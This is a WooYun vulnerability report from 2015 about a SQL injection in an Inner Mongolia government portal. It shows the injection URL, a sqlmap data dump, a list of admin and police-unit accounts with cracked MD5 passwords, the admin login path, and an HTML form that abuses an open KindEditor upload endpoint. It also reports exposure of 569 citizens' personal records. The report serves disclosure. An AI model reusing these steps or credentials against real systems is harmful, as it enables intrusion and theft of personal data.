当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152223

漏洞标题:内蒙古政务公开服务网SQL注入一枚,后台爆出各种姓名、身份证、电话、邮箱等信息(596条)

相关厂商:内蒙古政务公开服务网

漏洞作者: 空心

提交时间:2015-11-06 09:52

修复时间:2015-11-11 09:54

公开时间:2015-11-11 09:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-06: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL注入 569条姓名、身份证、电话、邮箱、单位等信息

详细说明:

注入点:

**.**.**.**:8188/website/mail/xiangxi.jsp?id=000028450141


569条姓名、身份证、电话、邮箱、单位等信息
sqlmap爬数据

1.png


2.png

3.png

4.png

5.png

6.png

7.png

8.png

9.png

10.png

11.png

12.png

13.png

14.png


解密MD5密文

PWD,USER_NAME
96E79218965EB72C92A549DD5A330112,adminzdh
96E79218965EB72C92A549DD5A330112,adminytkj
E0CCCD4C758FE1B1E4249365B6E96D9D,½»¹Ü×ܶÓ
E10ADC3949BA59ABBE56E057F20F883E,admin
E10ADC3949BA59ABBE56E057F20F883E,sysadmin
E10ADC3949BA59ABBE56E057F20F883E,ºôºÍºÆÌØÊÐ
E10ADC3949BA59ABBE56E057F20F883E,¼Íί
E10ADC3949BA59ABBE56E057F20F883E,¶½²ì×ܶÓ
E10ADC3949BA59ABBE56E057F20F883E,Éó¼Æ´¦
E10ADC3949BA59ABBE56E057F20F883E,°ì¹«ÊÒ
E10ADC3949BA59ABBE56E057F20F883E,ÕþÖβ¿
E10ADC3949BA59ABBE56E057F20F883E,ÐÌÕì×ܶÓ
E10ADC3949BA59ABBE56E057F20F883E,Íø°²×ܶÓ
E10ADC3949BA59ABBE56E057F20F883E,·´¿Ö×ܶÓ
E10ADC3949BA59ABBE56E057F20F883E,±ß·À×ܶÓ
E10ADC3949BA59ABBE56E057F20F883E,Ïû·À×ܶÓ
E10ADC3949BA59ABBE56E057F20F883E,¾¯ÎÀ¾Ö
E10ADC3949BA59ABBE56E057F20F883E,³öÈë¾³¹ÜÀí¾Ö
E10ADC3949BA59ABBE56E057F20F883E,ÈËÊÂѵÁ·´¦
E10ADC3949BA59ABBE56E057F20F883E,Ðû´«´¦
E10ADC3949BA59ABBE56E057F20F883E,ÏÖÒÛ°ì
E10ADC3949BA59ABBE56E057F20F883E,Ö¸»ÓÖÐÐÄ
E10ADC3949BA59ABBE56E057F20F883E,¹ú±£×ܶÓ
E10ADC3949BA59ABBE56E057F20F883E,¾­Õì×ܶÓ
E10ADC3949BA59ABBE56E057F20F883E,Öΰ²×ܶÓ
E10ADC3949BA59ABBE56E057F20F883E,°üÍ·ÊÐ
E10ADC3949BA59ABBE56E057F20F883E,liangfeng
E10ADC3949BA59ABBE56E057F20F883E,¼à¹Ü×ܶÓ
E10ADC3949BA59ABBE56E057F20F883E,·¨ÖƾÖ
E10ADC3949BA59ABBE56E057F20F883E,¾¯±£²¿
E10ADC3949BA59ABBE56E057F20F883E,½û¶¾×ܶÓ
E10ADC3949BA59ABBE56E057F20F883E,¿ÆОÖ
E10ADC3949BA59ABBE56E057F20F883E,ÐÐÕþ¹ÜÀí´¦
E10ADC3949BA59ABBE56E057F20F883E,а½ÌÕì²ì×ܶÓ
E10ADC3949BA59ABBE56E057F20F883E,»ú¹Øµ³Î¯
E10ADC3949BA59ABBE56E057F20F883E,Ç鱨ÖÐÐÄ
E10ADC3949BA59ABBE56E057F20F883E,Ðŷô¦
E10ADC3949BA59ABBE56E057F20F883E,º£À­¶ûº½¿Õ¿Ú°¶´¦
E10ADC3949BA59ABBE56E057F20F883E,¾¯È®»ùµØ
E10ADC3949BA59ABBE56E057F20F883E,×ÔÖÎÇø¿´ÊØËù
E10ADC3949BA59ABBE56E057F20F883E,¾¯²ìѧԺ
E10ADC3949BA59ABBE56E057F20F883E,¾¯²ìЭ»á
E10ADC3949BA59ABBE56E057F20F883E,¹«°²ÎÄÁª
E10ADC3949BA59ABBE56E057F20F883E,ÎÚº£ÊÐ
E10ADC3949BA59ABBE56E057F20F883E,³à·åÊÐ
E10ADC3949BA59ABBE56E057F20F883E,ͨÁÉÊÐ
E10ADC3949BA59ABBE56E057F20F883E,¶õ¶û¶à˹ÊÐ
E10ADC3949BA59ABBE56E057F20F883E,ºôÂ×±´¶ûÊÐ
E10ADC3949BA59ABBE56E057F20F883E,ÎÚÀ¼²ì²¼ÊÐ
E10ADC3949BA59ABBE56E057F20F883E,°ÍÑåÄ׶ûÊÐ
E10ADC3949BA59ABBE56E057F20F883E,ÐË°²ÃË
E10ADC3949BA59ABBE56E057F20F883E,°¢À­ÉÆÃË
E10ADC3949BA59ABBE56E057F20F883E,ÎýÁÖ¹ùÀÕÃË
E10ADC3949BA59ABBE56E057F20F883E,ÂúÖÞÀïÊÐ
E10ADC3949BA59ABBE56E057F20F883E,¶þÁ¬ºÆÌØÊÐ


15.png


16.png


96E79218965EB72C92A549DD5A330112 明文:111111
E10ADC3949BA59ABBE56E057F20F883E 明文:123456


公安厅也用弱口令,醉了
进后台

**.**.**.**:8188/sysadmin/login.jsp


17.png


18.png


出于好奇,看了下警民互动里面的各个选项,看到了姓名、身份证、邮箱、电话号码、单位、地址等诸多信息

19.png

20.png

21.png

22.png

23.png

24.png

25.png

26.png

27.png

28.png

29.png


共569条姓名、身份证、电话、邮箱、单位等信息
又找到了Kindeditor 4.1.10版本的编辑器

30.png


找出了地址:

**.**.**.**:8188/Kindeditor/


然而是jsp的站

**.**.**.**:8188/Kindeditor/jsp


32.png


35.png


36.png


37.png


38.png


33.png


**.**.**.**:8188/Kindeditor/jsp/upload_json.jsp?dir=file可以post上传文件
构造上传表单

<form action='**.**.**.**:8188/Kindeditor/jsp/upload_json.jsp?dir=file' enctype="multipart/form-data" method="post">
<input type="file" name="imgFile">
<input type="submit">
</form>


34.png


上传成功

39.png


结果

40.png

漏洞证明:

看详细说明

1.png


14.png


18.png


10.png


32.png


34.png


39.png


40.png

修复方案:

升级站点程序,开启防注入、伪静态

版权声明:转载请注明来源 空心@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-11 09:54

厂商回复:

最新状态:

暂无